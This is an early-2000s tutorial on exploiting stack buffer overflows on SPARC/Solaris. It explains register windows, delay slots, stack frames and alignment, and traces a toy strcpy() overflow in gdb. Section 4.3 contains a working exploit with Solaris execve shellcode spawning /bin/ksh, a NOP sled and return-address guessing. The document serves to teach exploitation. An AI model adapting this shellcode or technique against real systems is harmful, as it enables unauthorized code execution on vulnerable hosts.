" IT'S TOASTED "

Exploiting SPARC Buffer Overflow vulnerabilities
by pr1 <pr1@u-n-f.com>

----/ Contents

  1 - Introduction
  2 - Architecture Overview
    2.1 - Sparc Registers
    2.2 - Sparc Pipeline
    2.3 - Instruction Size
    2.4 - Function Calls
    2.5 - Leaf and Optimized Leaf Procedures
    2.6 - Sparc Stack
  3 - A Demonstration Vulnerability
    3.1 - Studying the overflow in theory
    3.2 - Studying the overflow with gdb
  4 - Building an exploit
    4.1 - Major differences between Sparc and x86
    4.2 - Alignment
    4.3 - The exploit
  5 - Alternative ways of exploiting
  6 - Conclusion
  7 - References
  8 - Greets

----/ 1 - Introduction

Sparc is a RISC architecture designed by Sun Microsystems. It is supported by many operating systems such as Solaris, Linux, OpenBSD and NetBSD. As Sun decided to develop Solaris >= 9 for Sparc only, and as there is not much information on Sparc overflows on the net, I decided to write this article. There are some major differences in how Sparc handles function calls, function returns and stack management that are worth knowing. If you ever asked yourself: "Why am I unable to exploit this simple strcpy() in main() on Sparc?", this paper has the answer.

----/ 2 - Architecture Overview

There are 32 general purpose registers visible on Sparc at any given time. 8 of them are the "global" registers. They are called %g0 - %g7 and stay the same across procedure calls. The other 24 registers form a so called register window. A window consists of 3 types of registers: the "in", "out" and "local" registers, 8 of each. A Sparc implementation can have from 2 to 32 windows. Because adjacent windows share 8 registers, every window adds 16 physical registers, which gives 8 + 2 * 16 = 40 up to 8 + 32 * 16 = 520 registers in total ( remember that the global registers are static ). The variable number of registers is the reason Sparc is called scalable.

At any given time only one window is visible. This window is selected by the CWP ( current window pointer ), which is a field of the PSR ( processor status register ) in Sparc V8. In Sparc V9 it is a register of its own.
The SAVE and RESTORE instructions, which change the CWP, are primarily used for procedure calls. The concept is that "in" registers contain incoming procedure arguments, "local" registers can be used for storing values while the procedure executes, and "out" registers contain outgoing arguments. The "global" registers are used for values that do not change much between procedure calls. The register windows overlap partially: the SAVE operation renames the "out" registers of the caller to become the "in" registers of the called procedure. Because procedure calls are quite frequent, this was meant to improve performance. In practice it turned out to be a questionable idea, based on studies that only considered isolated programs. The drawback: whenever the program interacts with the system, the registers have to be stored on the stack, which results in a lot of slow store and load instructions.

----/ 2.1 - Sparc Registers

The registers are organized as follows:

  %g0 - %g7 ( %r0  - %r7  ): global registers
  %o0 - %o7 ( %r8  - %r15 ): out registers, they contain arguments for procedure calls
  %l0 - %l7 ( %r16 - %r23 ): local registers, use them for local variables
  %i0 - %i7 ( %r24 - %r31 ): in registers, after a procedure call these registers contain incoming arguments

Some special registers:

  %g0         : always contains zero ( hardwired )
  %sp ( %o6 ) : the stack pointer, points to the top of the stack frame ( the last element pushed onto it )
  %o7         : return address of the called subroutine ( address of the call instruction )
  %fp ( %i6 ) : the frame pointer, points to the bottom of the stack frame
  %i7         : return address of the current subroutine ( return address - eight )
  %o0         : return value from the called subroutine

----/ 2.2 - The Sparc Pipeline

The Sparc architecture uses a pipeline to improve performance. With a pipeline the CPU can fetch and execute more instructions in the same time than without one. Usually there are several steps until a CPU finishes the execution of an instruction.
The instruction has to be fetched, decoded and executed, branches have to be completed ( pc = npc ) and results have to be written to the destination. Doing all these things and only then starting from the beginning with the next instruction is a waste of time. Thus a pipeline was implemented: while the CPU decodes the first instruction it already fetches the next one, and so on. Using this technique several instructions can be executed almost in parallel. How these steps are implemented differs from pipeline to pipeline. The Sparc pipeline has a depth of two. Hence there is a PC and an nPC ( next program counter, pointing to the next instruction to be executed ). nPC is always copied into PC after the current instruction was executed.

You might ask yourself what happens if the CPU executes a branch instruction ( jumps somewhere ) and already has the next instruction in the pipeline. It is unknown at compile time whether this branch will be taken or not. The already fetched instruction could simply be discarded, but this would be a performance loss. Thus the Sparc architecture executes the instruction following the branch instruction before the branch is taken, e.g.:

    call subroutine       <- %o0 is already zero when subroutine starts
    xor %o0,%o0,%o0       <- executed before control reaches subroutine

This is known as a branch delay slot.

---/ 2.3 - Instruction size

The x86 instructions differ in their length. Sparc uses a pipeline to improve performance, and the designers found it easier to implement every instruction as a four byte opcode sequence. But this also means that a NOP has a length of four bytes as well. Usually this would be a little problem ( consider what happens if we jump into the middle of a NOP ). Because we have to care about alignment anyway, this problem vanishes soon though.

---/ 2.4 - Function calls

The Sparc architecture uses the call/ret instruction pair to implement procedure calls. RET is a so called synthetic instruction, and so is CALL when its target is held in a register ( a CALL to a label is a real hardware instruction that behaves the same way ).
The hardware equivalent instruction ( the instruction assembled into the binary ) is a jump ( jmpl ). Note that "l" stands for link, not for long.

The assembler plays a bigger role for execution speed on RISC than on CISC:

* The assembler reorders instructions into a logically equivalent sequence to prevent different pipeline hazards.
* It also optimizes branch delay slots by placing useful instructions in them.
* It expands synthetic instructions into hardware instructions or even combines instructions.

For example:

* call subroutine == jmpl subroutine,%o7 ( remember that %o7 contains the called subroutine's return address )
* ret == jmpl %i7+8,%g0 ( remember that %i7 is the return address - 8, %g0 always contains zero )

The CALL instruction saves the current value of PC in %o7, updates PC and sets nPC to the address specified in the CALL. The RET instruction updates PC and sets nPC to %i7+8. 8 bytes are added because the address saved in %i7 is the address of the call instruction itself. Because all instructions have a size of four bytes and there is a branch delay slot of four bytes after the call, we have to skip eight bytes. %i7 is used instead of %o7 because the SAVE instruction renamed the "out" registers to "in" registers.

The next thing a procedure does is reserve some stack space to store automatic ( local ) variables, compiler temporaries, the pointer to the return value, ... This is done with the SAVE instruction and undone with the RESTORE instruction.

* SAVE: The SAVE instruction reserves stack space for the above mentioned things. Its syntax is: save %sp, imm, %sp ( imm being an immediate value ). SAVE makes the old %sp the new %fp, adds imm to the old %sp and stores the result in the new %sp. Because the stack grows down, imm has to be a negative value. The CWP field in the PSR is also decremented ( "out" registers become "in" registers ). Note that on Sparc V9 the behaviour is a little different: Sparc V9 has a separate register for the CWP, SAVE increments the CWP and RESTORE decrements it.
* RESTORE: RESTORE increments the CWP ( Sparc V9 decrements it ). The "in" registers become the "out" registers again. The eight "in" registers and the eight "local" registers are restored to the values they contained before the most recent SAVE instruction. Apart from that, RESTORE acts like an add instruction, except that the source registers are taken from the old register window and the destination register from the new one. The old %fp thereby becomes the new %sp.

A procedure prologue and epilogue thus look like:

    save %sp, -368, %sp
    ....
    ....
    ....
    ret
    restore

The restore sits in the delay slot of ret: it is executed one slot later in the pipeline, but its effects take place before ret changes the %pc.

---/ 2.5 - Leaf and Optimized Leaf Procedures

A leaf procedure is a procedure that does not call any other procedures. A routine that does not allocate a register window of its own by executing the SAVE instruction is termed an optimized leaf procedure. One way to recognize an optimized leaf procedure is to scan its assembly code and note the absence of a SAVE instruction. Optimized leaf routines do not have a stack frame allocated to them; they use their caller's stack frame and register window. If the routine is such a leaf, the previous frame's PC has to be looked up in register %o7. Otherwise it has to be looked up in register %i7, which is what register %o7 becomes after a SAVE instruction. This is what defines leafness.
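The window renaming from 2.4 and the %o7/%i7 distinction from 2.5 can be replayed with a small model. This is only a sketch under assumptions: it follows the Sparc V8 direction ( SAVE decrements the CWP ), it assumes 8 windows, it ignores window overflow traps, and all names ( win_cpu, win_save, ... ) are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define NWINDOWS 8   /* assumed for the sketch; the text allows 2 to 32 */

/* Hypothetical model of the windowed part of the register file. */
struct win_cpu {
    uint32_t regs[NWINDOWS * 16]; /* 16 physical registers per window */
    unsigned cwp;                 /* current window pointer */
};

/* Physical register count: 8 globals plus 16 per window. */
unsigned total_registers(unsigned nwindows) {
    assert(nwindows >= 2 && nwindows <= 32);
    return 8 + 16 * nwindows;
}

/* %o0 - %o7 of the current window. */
uint32_t *win_out(struct win_cpu *c, unsigned n) {
    assert(n < 8);
    return &c->regs[16 * c->cwp + n];
}

/* %i0 - %i7 of the current window: the "out" registers of the caller,
 * whose window number is one higher on V8. */
uint32_t *win_in(struct win_cpu *c, unsigned n) {
    assert(n < 8);
    return &c->regs[16 * ((c->cwp + 1) % NWINDOWS) + n];
}

/* SAVE on V8: step to the next lower window number. */
void win_save(struct win_cpu *c) {
    c->cwp = (c->cwp + NWINDOWS - 1) % NWINDOWS;
}

/* RESTORE on V8: step back to the caller's window. */
void win_restore(struct win_cpu *c) {
    c->cwp = (c->cwp + 1) % NWINDOWS;
}

/* call: the address of the call instruction itself lands in %o7. */
void win_call(struct win_cpu *c, uint32_t call_addr) {
    *win_out(c, 7) = call_addr;
}

/* ret  == jmpl %i7+8,%g0 ( procedure that executed SAVE ) */
uint32_t win_ret_target(struct win_cpu *c) {
    return *win_in(c, 7) + 8;
}

/* retl == jmpl %o7+8,%g0 ( optimized leaf, no SAVE ) */
uint32_t win_retl_target(struct win_cpu *c) {
    return *win_out(c, 7) + 8;
}
```

With a call at 0x10640 ( the value of copy's %i7 in the gdb session of 3.2 ) both win_retl_target() before a win_save() and win_ret_target() after it yield 0x10648: the same physical register is simply visible under a different name.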
---/ 2.6 - The Sparc Stack

                     High Addresses

           /-----------------------------------------------\
%fp -> cw  | automatic variables                           |
           \-----------------------------------------------/
           /-----------------------------------------------\
       cw  | space allocated with alloca()                 |
           \-----------------------------------------------/
           /-----------------------------------------------\
       cw  | space for compiler temporaries                |
           \-----------------------------------------------/
           /-----------------------------------------------\
       cl  | outgoing parameters                           |
           \-----------------------------------------------/
           /-----------------------------------------------\
       cl  | copies of outgoing parameters                 |
           \-----------------------------------------------/
           /-----------------------------------------------\
       cl  | one word ( hidden parameter )                 |
           \-----------------------------------------------/
           /-----------------------------------------------\
%sp -> cl  | 64 byte for possible copy of register window  |
           \-----------------------------------------------/

                     Low Addresses

The stack consists of 2 parts:

Current Workspace ( cw ): The current workspace is used by C procedures. It consists of automatic variables, space allocated by alloca() and space for compiler temporaries. When writing an assembly routine you only have to calculate space for the temporary values you need.

Call Linkage ( cl ): This space is required to save outgoing registers and the register window when control passes to another procedure. The Call Linkage is important for exploiting Sparc overflows.

The minimum stack frame size is 96 bytes. It consists of:

* 64 bytes for a copy of the register window
* 6 * 4 bytes for outgoing parameters
* 4 bytes for the hidden parameter

This adds up to only 92 bytes, but the stack and frame pointer are required to be on an eight byte boundary ( 92 is not divisible by eight ). Hence the minimum stack frame size is 96 bytes. The rounding also guarantees that there is at least space for one temporary variable. As the current workspace contains a dynamically allocated area ( alloca() ), we cannot tell at compile time how many bytes it will occupy.
Hence automatic variables are accessed via %fp with negative offsets and the others are accessed via %sp with positive offsets.

----/ 3 - A demonstration vulnerability

Not every buffer overflow is exploitable on Sparc. We need at least one level of function nesting to be able to exploit it.

    #include <string.h>

    void copy( const char *a ){
        char buf[256];
        strcpy(buf,a);          /* no bounds check */
    }

    int main( int argc, char *argv[] ) {
        copy( argv[1] );
    }

---/ 3.1 - Studying the overflow in theory

Let us recall what happens on function calls and function returns. %i7 contains main's return address: main() will return into _start, which calls exit() to perform cleanup before program termination. When main() calls copy(), the call ( jmpl ) saves the return address back into main() in register %o7, and the SAVE instruction in copy() switches the register window, renaming %o7 into %i7. The %i7 of main() is already filled with main's return address into _start though. Thus main's register window is stored on the stack, at copy's %fp. %i7 now contains copy's return address back into main(). strcpy() follows the same scheme.

When strcpy() overflows buf, it overwrites the upper part of copy's stack frame and, right behind it, the saved register window of main(). strcpy's own stack frame and its return address back into copy() are still intact, so strcpy() returns into copy(). All register contents are still intact, but the stack above buf is damaged. copy() finally restores and jumps back to main(). But main's register window was saved at copy's %fp and damaged by our overflowing strcpy(). When returning into main() the saved/damaged register window is restored. The "in" and "local" registers now contain user supplied data. When main() returns it would usually jump into _start to perform cleanup, but as we changed the return address it jumps into nowhere ( 0x61616161 + 8 ) and dies with a SIGBUS error.

---/ 3.2 - Studying the overflow with gdb

Let us feed this into gdb and see what happens.
Note that I have deleted redundant information, like static registers that are not saved in the register windows, to shorten the output and to make the overflowing process clearer.

These are our registers in main() before copy() is called.

(gdb) info register
sp             0xffbef838
o7             0x106c0
l0             0xc
l1             0xff3400a4
l2             0xff33c5d8
l3             0x0
l4             0x0
l5             0x0
l6             0x0
l7             0xff3e6694
i0             0x2
i1             0xffbef90c
i2             0xffbef918
i3             0x20870
i4             0x0
i5             0x0
fp             0xffbef8a8
i7             0x104c8

This is our stack frame before copy() is called. The first 64 bytes are our saved register window. Note the saved PC at 0xffbef874.

(gdb) x/96x $sp
%sp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000 [%l0 - %l3]
       0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694 [%l4 - %l7]
       0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870 [%i0 - %i3]
       0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 [%i4 - %i7]
       . . . . . . . . . . . . . . .
%fp -> 0xffbef9a8: 0x00000003 0x00010034 0x00000004 0x00000020

Breakpoint 5, 0x10610 in copy ()

Register values in copy() before the call to strcpy().

(gdb) info register
sp             0xffbef6c8
o7             0x0
l0             0x0
l1             0x0
l2             0x0
l3             0x0
l4             0x0
l5             0x0
l6             0x0
l7             0x0
i0             0xffbefa37
i1             0xffbef910
i2             0xffbef90c
i3             0x300
i4             0x2371c
i5             0xff29bbc0
fp             0xffbef838
i7             0x10640

And the stack frame before the strcpy() call. Note how the saved register window of main() now lies "below" our input buffer in the dump, i.e. at higher addresses. The first 64 bytes at %sp are the save area for the register window of copy(). We will not be able to overwrite the PC at 0xffbef704, because it is "above" our input buffer in the dump, i.e. at a lower address. This PC contains the return address back to main().

(gdb) x/96x $sp
%sp -> 0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
       0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640 [saved PC]
       . . . . . . . . . . . . . . .
buf -> 0xffbef728: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef738: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef748: 0x00000000 0x00000000 0x00000000 0x00000000
       . . . . . . . . . . . . . . .
%fp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000
       0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694
       0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870
       0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 <- PC ( PC to exit ( in _start ) )

Breakpoint 6, 0x1061c in copy ()

Register values after strcpy() overflowed the buffer.

(gdb) info register
sp             0xffbef6c8
o7             0x10614
l0             0x0
l1             0x0
l2             0x0
l3             0x0
l4             0x0
l5             0x0
l6             0x0
l7             0x0
i0             0xffbefa37
i1             0xffbef910
i2             0xffbef90c
i3             0x300
i4             0x2371c
i5             0xff29bbc0
fp             0xffbef838
i7             0x10640

And the corrupted stack frame.

(gdb) x/96x $sp
       0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
       0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640*
                   [ * PC to main still intact ]
       . . . . . . . . . . . . . . .
buf -> 0xffbef728: 0x61616161 0x61616161 0x61616161 0x61616161
       0xffbef738: 0x61616161 0x61616161 0x61616161 0x61616161
       0xffbef748: 0x61616161 0x61616161 0x61616161 0x61616161
       0xffbef758: 0x61616161 0x61616161 0x61616161 0x61616161
       . . . . . . . . . . . . . . .
       0xffbef868: 0x61616161 0x61616161 0x61616161 0x61616161*
                   [ * PC to exit damaged ]

Very nice. We were able to alter main's saved PC into exit. After copy() restores, the "in" and "local" registers are set to the "saved/damaged" values. Since we altered these values by overflowing the input buffer, the "in" and "local" registers now contain the values we supplied.
Breakpoint 7, 0x10648 in main ()

(gdb) info register
sp             0xffbef838
o7             0x10640
l0             0x61616161
l1             0x61616161
l2             0x61616161
l3             0x61616161
l4             0x61616161
l5             0x61616161
l6             0x61616161
l7             0x61616161
i0             0x61616161
i1             0x61616161
i2             0x61616161
i3             0x61616161
i4             0x61616161
i5             0x61616161
fp             0x61616161
i7             0x61616161   <- next ret will jump here+8

main() is now about to clean up and jump into exit. But as we altered its saved PC it will jump to 0x61616161+8 and die.

----/ 4 - Building an exploit

In this section we will build an exploit for the vulnerability we just studied. We also list some differences between x86 and Sparc exploitation and cover alignment issues.

---/ 4.1 - Differences between x86 and Sparc exploitation

* memory access: On x86, as on most CISC processors, we can write to unaligned memory addresses without the CPU complaining. Sometimes we only have to adjust the alignment. Not so on Sparc. See more about alignment in 4.2. Note that tolerating unaligned memory accesses is a CPU feature of the x86 family. It will complain if the AC ( alignment check ) flag is set in the flags register.

* call/ret internals: Because of the internal working of the Sparc stack frames and ret/call pairs we need at least one level of function nesting to be able to exploit a buffer overflow vulnerability on a Sparc.

* finding the stack base address: Sparc Solaris uses a different stack base address on different architectures.

    - sun4u: 0xffbe....
    - sun4m: 0xefff....
    - sun4d: 0xdfff....

  We can get an approximate stack address with the following assembler snippet:

    unsigned long get_sp( void ) {
        __asm__(" or %sp, %sp, %i0 " );
    }

* size of overflow: On a Sparc we usually have to be able to write more than just a few bytes beyond the target buffer. This is because we have to overwrite at least %l0 - %l7 and %i0 - %i6 ( 15 * 4 = 60 bytes ) before reaching the saved return address.

* overwriting an address with one byte: Overflowing an address with one byte on x86 lets us control the least significant byte.
Chances are good that we can alter some stack address a little bit so that it points into our shellcode. As Sparc is a big endian architecture, we can only write from most to least significant byte. Thus we can alter only the most significant byte with a one byte overflow. This decreases our chances of providing some useful address. See [3] for more details on one byte overflows.

---/ 4.2 - Alignment

Like most other RISC processors, Sparc does not allow unaligned memory accesses. This means we must not read words from, write words to or jump to any address that is not on a 4 byte boundary. Otherwise the CPU generates a Bus Error exception and our program dies. Also consider what would happen if our NOPs were not placed on 4 byte boundaries: every aligned address we jump to would point into the middle of a NOP. Remember that every Sparc instruction is 4 bytes long. It is very probable that the processor would generate an Illegal Instruction exception and our program would crash as well. That is why we have to take care that our exploit return address is a multiple of 4, our shellcode lies at a 4 byte boundary in our attack buffer and the length of our attack buffer itself is a multiple of 4.

---/ 4.3 - Exploiting the vulnerability

Note that we take care to write only to aligned memory addresses. If we put our shellcode at some unaligned address in our attack buffer we will never be able to reach it. The same goes for the NOPs: unaligned NOPs make us jump into the middle of a NOP every time we reach them. This results in an Illegal Instruction exception and our program dies without executing our code. We also have to set %fp to a "safe" address, or the return from main() will crash. A "safe" address is simply some valid stack address. We could also use our return address to overwrite %fp.
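The byte order argument from 4.1 and the alignment rules from 4.2 can be checked with a few lines of portable C. This is a minimal sketch, not part of the original exploit: the helper names ( store_be32, one_byte_overflow_be, align_down4, ... ) are invented for illustration, and the byte arrays only imitate how a 32 bit address is laid out in memory on a big endian ( Sparc ) and a little endian ( x86 ) machine.

```c
#include <stdint.h>

/* Store v most significant byte first, as Sparc lays it out in memory. */
void store_be32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v >> 24);
    p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);
    p[3] = (unsigned char)v;
}

uint32_t load_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Store v least significant byte first, as x86 lays it out in memory. */
void store_le32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

uint32_t load_le32(const unsigned char *p) {
    return ((uint32_t)p[3] << 24) | ((uint32_t)p[2] << 16) |
           ((uint32_t)p[1] << 8)  |  (uint32_t)p[0];
}

/* A one byte overflow reaches only the lowest-addressed byte of the
 * stored address. On big endian that is the most significant byte. */
uint32_t one_byte_overflow_be(uint32_t addr, unsigned char b) {
    unsigned char mem[4];
    store_be32(mem, addr);
    mem[0] = b;
    return load_be32(mem);
}

/* On little endian the same write changes the least significant byte. */
uint32_t one_byte_overflow_le(uint32_t addr, unsigned char b) {
    unsigned char mem[4];
    store_le32(mem, addr);
    mem[0] = b;
    return load_le32(mem);
}

/* Word accesses and jump targets have to be multiples of 4 on Sparc. */
int is_word_aligned(uint32_t addr) {
    return (addr & 3u) == 0;
}

/* Round an address down to the previous 4 byte boundary. */
uint32_t align_down4(uint32_t addr) {
    return addr & ~(uint32_t)3;
}
```

For the stack address 0xffbef838 from 3.2, a single overflowing zero byte gives 0x00bef838 in the big endian case, which is nowhere near the stack, but 0xffbef800 in the little endian case, which still is a nearby stack address. align_down4() has the same effect as the masking of ret in the listing that follows.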
/* Exploits toy vulnerability on Sparc/Solaris
 *
 * pr1
 * June 2002
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

/* lsd - Solaris shellcode */
static char shell[]=         /* 10*4+8 bytes */
    "\x20\xbf\xff\xff"       /* bn,a                 */
    "\x20\xbf\xff\xff"       /* bn,a                 */
    "\x7f\xff\xff\xff"       /* call                 */
    "\x90\x03\xe0\x20"       /* add %o7,32,%o0       */
    "\x92\x02\x20\x10"       /* add %o0,16,%o1       */
    "\xc0\x22\x20\x08"       /* st %g0,[%o0+8]       */
    "\xd0\x22\x20\x10"       /* st %o0,[%o0+16]      */
    "\xc0\x22\x20\x14"       /* st %g0,[%o0+20]      */
    "\x82\x10\x20\x0b"       /* mov 0x0b,%g1         */
    "\x91\xd0\x20\x08"       /* ta 8                 */
    "/bin/ksh"
;

#define BUFSIZE 336

/* SPARC NOP */
static char np[] = "\xac\x15\xa1\x6e";

unsigned long get_sp( void ) {
    __asm__("or %sp,%sp,%i0");
}

int main( int argc, char *argv[] ) {
    char buf[ BUFSIZE ],*ptr;
    unsigned long ret,sp;
    int rem,i,err;

    ret = sp = get_sp();

    /* optional offset ( hex ) to subtract from the guessed address */
    if( argv[1] ) {
        ret -= strtoul( argv[1], (void *)0, 16 );
    }

    /* align return address: clear the low two bits */
    if( ( rem = ret % 4 ) ) {
        ret &= ~(rem);
    }

    /* fill the whole buffer with aligned 4 byte NOPs */
    bzero( buf, BUFSIZE );
    for( i = 0; i < BUFSIZE; i+=4 ) {
        strcpy( &buf[i], np );
    }

    /* shellcode goes right in front of the last 8 bytes */
    memcpy( (buf + BUFSIZE - strlen( shell ) - 8),shell,strlen( shell ));

    ptr = &buf[328];

    /* set fp to a safe stack value */
    *( ptr++ ) = ( sp >> 24 ) & 0xff;
    *( ptr++ ) = ( sp >> 16 ) & 0xff;
    *( ptr++ ) = ( sp >> 8 ) & 0xff;
    *( ptr++ ) = ( sp ) & 0xff;

    /* we now overwrite saved PC */
    *( ptr++ ) = ( ret >> 24 ) & 0xff;
    *( ptr++ ) = ( ret >> 16 ) & 0xff;
    *( ptr++ ) = ( ret >> 8 ) & 0xff;
    *( ptr++ ) = ( ret ) & 0xff;

    /* terminate the string; this also zeroes the low byte of ret */
    buf[ BUFSIZE -1 ] = 0;

#ifndef QUIET
    printf("Return Address 0x%lx\n",ret);
#endif

    err = execl( "./vul", "vul", buf, ( void *)0 );
    if( err == -1 ) perror("execl");
}

----/ 5 - Alternative ways of exploitation

As we saw, very small overruns are not as likely to be exploitable on Sparc as they are on other platforms. But let us consider some special cases where you are able to overwrite other sensitive information on the stack. An example is overwriting a program's function pointer or jmp_buf with the address of system() and making it execute /bin/sh.
See [4] for more information about overwriting such structures. On Sparc the text segment is mapped at small addresses. If we try to overwrite such a function pointer/jmp_buf with the address of some other function, we cannot write this small address without any 0x00 bytes. This is because we can only write from most to least significant byte on Sparc. An alternative is placing shellcode on the stack and overwriting the function pointer with the shellcode's stack address, whose eight hex digits ( four bytes ) normally contain no zero byte.

Because of alignment restrictions on Sparc we can't exploit format string vulnerabilities via the "%n" directive the way it is done on x86 ( writing one byte 4 times ). With the short qualifier the alignment is either emulated in software or special machine instructions are used, and you can usually write on every two byte boundary. See [6] for more information.

The return into libc technique can also be applied on Solaris/Sparc to defeat non executable stack patches. See [7] for more information.

Dynamic heap overflows via corruption of malloc internal structures are exploitable on Sparc as well. See [8] and [9] for a discussion of the glibc and the SysV malloc implementations and their exploitation.

----/ 6 - Conclusion

We need a bit more luck to be able to exploit Sparc buffer overflows than their brothers/sisters on x86. In general it is not enough to be able to overwrite just a few bytes beyond the buffer. Additionally we saw that the way the stack is handled has a great influence on the exploitability of buffer overrun vulnerabilities. This class of vulnerabilities cannot always be exploited on Sparc, as there must exist at least one level of subroutine call nesting, so that two consecutive ret/restore pairs are executed by the vulnerable program after its stack got overrun.
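The two conditions summarised above ( a long enough overrun and a second ret/restore pair ) can be replayed on paper with the addresses from the gdb session in 3.2. The following is only a sketch of that arithmetic, not a model of real hardware: it assumes, as the paper does, that main's window sits in the save area at copy's %fp, and the function and macro names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_ADDR    0xffbef728u /* buf in copy(), from the gdb dump        */
#define MAIN_SP     0xffbef838u /* copy's %fp: save area of main's window  */
#define I7_SLOT     15          /* %l0-%l7, %i0-%i6 come first             */
#define STACK_BYTES 512         /* size of the simulated stack slice       */

/* Byte offset from the start of buf to main's saved %i7. */
size_t offset_to_saved_i7(void) {
    return (size_t)(MAIN_SP - BUF_ADDR) + I7_SLOT * 4;
}

/* Simulate strcpy() of `len` fill bytes ( plus the terminating zero )
 * into buf, then return the address main() would jump to on ret, which
 * is its restored %i7 + 8. copy() itself still returns correctly, since
 * its own return address lives in a register or below buf. */
uint32_t main_ret_target_after_overflow(size_t len, unsigned char fill,
                                        uint32_t orig_i7) {
    unsigned char stack[STACK_BYTES];  /* index 0 is the start of buf */
    size_t off = offset_to_saved_i7();

    assert(len + 1 <= sizeof stack);
    memset(stack, 0, sizeof stack);

    /* main's saved %i7, stored big endian */
    stack[off]     = (unsigned char)(orig_i7 >> 24);
    stack[off + 1] = (unsigned char)(orig_i7 >> 16);
    stack[off + 2] = (unsigned char)(orig_i7 >> 8);
    stack[off + 3] = (unsigned char)orig_i7;

    /* the unchecked copy */
    memset(stack, fill, len);
    stack[len] = 0;

    /* restore in copy() reloads main's window; main's ret uses %i7 + 8 */
    uint32_t i7 = ((uint32_t)stack[off] << 24) |
                  ((uint32_t)stack[off + 1] << 16) |
                  ((uint32_t)stack[off + 2] << 8) |
                   (uint32_t)stack[off + 3];
    return i7 + 8;
}
```

offset_to_saved_i7() evaluates to 332, which matches the 336 byte attack buffer of 4.3 with the frame pointer at offset 328 and the return address at offset 332. An input of 256 bytes leaves main's return target at 0x104d0, while 336 bytes of 'a' turn it into 0x61616169.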
----/ 7 - References

[1] UNF - United Net Frontier
    [http://www.u-n-f.com]

[2] Sun Microsystems
    Sparc Assembly Language Reference Manual
    [http://www.sparc.org]

[3] Klog
    Frame pointer overwriting
    [http://www.phrack.org/show.php?p=55&a=8]

[4] Matt Conover aka. Shok
    w00w00 on Heap Overflows
    [http://www.w00w00.org/files/articles/heaptut.txt]

[5] some interesting pdfs about computer architectures
    [http://www.segfault.net/~scut/cpu]

[6] Scut
    Exploiting Format String vulnerabilities
    [http://www.team-teso.net/releases/formatstring-1.2.tar.gz]

[7] Horizon
    Return into libc exploits on Sparc/Solaris
    [http://packetstormsecurity.nl/groups/horizon/stack.txt]

[8] Maxx
    Exploiting dynamic heap overflows via malloc chunk corruption.
    [http://www.phrack.org/phrack/57/p57-0x08]

[9] Exploiting dynamic heap overflows via malloc chunk corruption.
    [http://www.phrack.org/phrack/57/p57-0x09]

----/ 8 - Greetings

- Big thx to Scut for reviewing the paper
- Svoern for mental support
- all the other UNF fellows